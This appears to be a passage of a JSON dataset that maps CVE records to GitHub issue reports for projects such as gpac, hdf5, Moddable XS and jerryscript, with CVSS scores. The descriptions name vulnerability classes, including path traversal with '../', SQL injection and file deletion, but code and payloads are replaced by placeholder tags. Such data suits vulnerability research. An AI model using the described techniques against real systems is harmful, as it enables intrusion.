        "description": "arbitrary file read vulnerability. poc After login as admin,file manager and downloadfunction FILETAG after change path param can read arbitrary file FILETAG analysis FILETAG FILETAG FILETAG we can use ../ to traverse to the previous directory suggest you can check path ,for example check if it has APITAG then refuse this request",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46204",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/14",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/14",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-04T02:47:28Z",
        "description": "There is SQL blind injection at APITAG Link\". analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id,and FILETAG extends Article FILETAG FILETAG poc edit link FILETAG FILETAG then edit id as APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46225",
        "Issue_Url_old": "https://github.com/LoicMarechal/libMeshb/issues/21",
        "Issue_Url_new": "https://github.com/loicmarechal/libmeshb/issues/21",
        "Repo_new": "loicmarechal/libmeshb",
        "Issue_Created_At": "2022-01-07T01:08:36Z",
        "description": "Buffer overflow when processing malformed mesh files. Hi folks, An interesting crash was found while fuzz testing of the mesh2poly binary which can be triggered via a malformed mesh file. Although the below malformed file only crashes the program as is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. APITAG (create file from scratch, no magic bytes necessary) APITAG debug log CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46234",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2023",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2023",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-03T12:52:03Z",
        "description": "Null Pointer Dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46236",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2024",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2024",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-03T12:56:20Z",
        "description": "Null Pointer Dereference in gf_sg_vrml_field_pointer_del () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46237",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2033",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2033",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-05T09:17:46Z",
        "description": "Untrusted pointer dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46238",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2027",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2027",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-03T13:30:56Z",
        "description": "stack overflow in gf_node_get_name () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46239",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2026",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2026",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-03T13:18:56Z",
        "description": "Invalid free in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46240",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2028",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2028",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-03T13:46:36Z",
        "description": "Null Pointer Dereference in gf_dump_vrml_sffield () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46242",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1329",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1329",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-25T14:17:45Z",
        "description": "A heap use after free in in H5AC_unpin_entry. Version: APITAG System information APITAG command: APITAG FILETAG Result Segmentation fault ASAN ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46243",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1326",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1326",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-25T12:26:04Z",
        "description": "Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Version APITAG command: APITAG FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46244",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1327",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1327",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-25T13:30:58Z",
        "description": "Divide By Zero in H5T__complete_copy () at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG Result ERRORTAG bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46255",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/21",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/21",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2022-01-07T05:45:28Z",
        "description": "There is an arbitrary file deletion vulnerability in your code. \\ Author: yukidddd \\ Submit date: PATHTAG \\ Target: FILETAG \\ Version NUMBERTAG UTF8 SP NUMBERTAG URLTAG \\ APITAG to insufficient filtering of the parameter filename, it can cause any file to be deleted \\ APITAG FILETAG NUMBERTAG Now,content of the root folder of the website is like this,and we created a new FILETAG as a test FILETAG NUMBERTAG Then we log in as a normal user and send the following payload FILETAG CODETAG NUMBERTAG And now,the FILETAG file has been deleted FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46311",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2038",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2038",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-09T06:44:25Z",
        "description": "Null Pointer Dereference in gf_sg_destroy_routes\uff08\uff09at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46313",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2039",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2039",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-09T07:07:05Z",
        "description": "A segmentation fault in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46322",
        "Issue_Url_old": "https://github.com/svaarala/duktape/issues/2448",
        "Issue_Url_new": "https://github.com/svaarala/duktape/issues/2448",
        "Repo_new": "svaarala/duktape",
        "Issue_Created_At": "2022-01-10T03:47:30Z",
        "description": "An SEGV issue detected when compiled with UBSAN. Duktape revision Commit NUMBERTAG a1b NUMBERTAG ef URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG Execution without ASAN APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46323",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2122",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/2122",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2021-12-21T14:03:50Z",
        "description": "SEGV APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46324",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2121",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/2121",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2021-12-21T13:15:35Z",
        "description": "Stack buffer overflow APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46325",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2114",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/2114",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2021-12-15T08:17:55Z",
        "description": "stack buffer overflow APITAG in vcbprintf. Espruino revision Commit NUMBERTAG a9f NUMBERTAG a0 URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46326",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/759",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/759",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-28T09:45:33Z",
        "description": "Heap buf overflow ( PATHTAG ) in __asan_memcpy. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG No ASAN Output APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46327",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/766",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/766",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-01-07T16:05:55Z",
        "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46328",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/751",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/751",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-14T02:49:38Z",
        "description": "Heap buffer overflow in __libc_start_main. Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46329",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/768",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/768",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-01-07T16:08:53Z",
        "description": "SEGV ( PATHTAG ) in _fini. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46330",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/774",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/774",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-01-10T02:55:10Z",
        "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46331",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/750",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/750",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-14T02:18:16Z",
        "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46332",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/752",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/752",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-15T05:06:41Z",
        "description": "Heap buffer overflow PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46332",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/749",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/749",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-13T06:51:03Z",
        "description": "APITAG SEGV PATHTAG in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG description asan log ERRORTAG release crash CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46333",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/769",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/769",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-01-07T16:10:20Z",
        "description": "Negative size param ( PATHTAG ) in __asan_memmove. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG Execution & Output ERRORTAG No ASAN Output APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46334",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/760",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/760",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-28T10:22:58Z",
        "description": "A weird stack overflow when compiled with ASAN. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG ` No ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46335",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/748",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/748",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-12-13T06:47:02Z",
        "description": "APITAG Null pointer dereference in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG asan log ERRORTAG release log CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46335",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/767",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/767",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-01-07T16:07:28Z",
        "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46336",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4927",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4927",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:06:49Z",
        "description": "Assertion 'opts & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46337",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4930",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4930",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:09:14Z",
        "description": "Assertion 'page_p != NULL' failed at PATHTAG (parser_list_get NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46338",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4900",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4900",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-13T08:54:30Z",
        "description": "Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma helpers.c (ecma_get_lex_env_type).. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG ASAN closed Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46339",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4935",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4935",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:17:32Z",
        "description": "Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case FILETAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46340",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4924",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4924",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:04:22Z",
        "description": "Assertion 'context_p >stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p >stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46342",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4934",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4934",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2022-01-04T06:13:59Z",
        "description": "Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
